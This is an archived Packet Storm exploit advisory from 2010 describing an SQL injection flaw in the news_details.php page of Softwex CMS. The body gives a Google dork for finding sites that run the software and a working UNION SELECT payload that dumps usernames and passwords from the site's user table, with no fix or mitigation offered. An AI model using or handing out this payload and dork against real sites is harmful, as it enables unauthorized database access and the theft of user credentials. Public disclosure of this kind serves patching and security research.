Softwex CMS SQL Injection

2010-07-09T00:00:00
ID PACKETSTORM:91643
Type packetstorm
Reporter GlaDiaT0R
Modified 2010-07-09T00:00:00

Description

                                        
                                            `##############################################################################  
# [+]Title: [Softwex CMS (news_details.php) SQL Injection Vulnerability]  
##############################################################################  
# [+] About :  
==============================================================================  
# Author : GlaDiaT0R   
# Contact: the_gl4di4t0r[AT]hotmail[DOT]com or berrahal.ryadh[AT]gmail[DOT]com  
# Team : Tunisian Power Team  
# Greetz : ALLAH ! , Boomrang_victim, Marwen_Neo, Alphanix, Zigma & my friends  
#  
# Software Link: http://softwex.com/services/content-management-systems.aspx  
# Google dork : [ Powered by Softwex ]  
##############################################################################  
# [+] Exploits :  
==============================================================================  
#  
# Path: http://localhost/news_details.php?id=[SQL]  
#   
# Demo : -1994+union+all+select+1,group_concat(login,0x3a,password),3,4,5,6,7,8+from+user--  
#   
#   
#  
##############################################################################  
# Notice: I'M MUSLIM  
##############################################################################  
  
`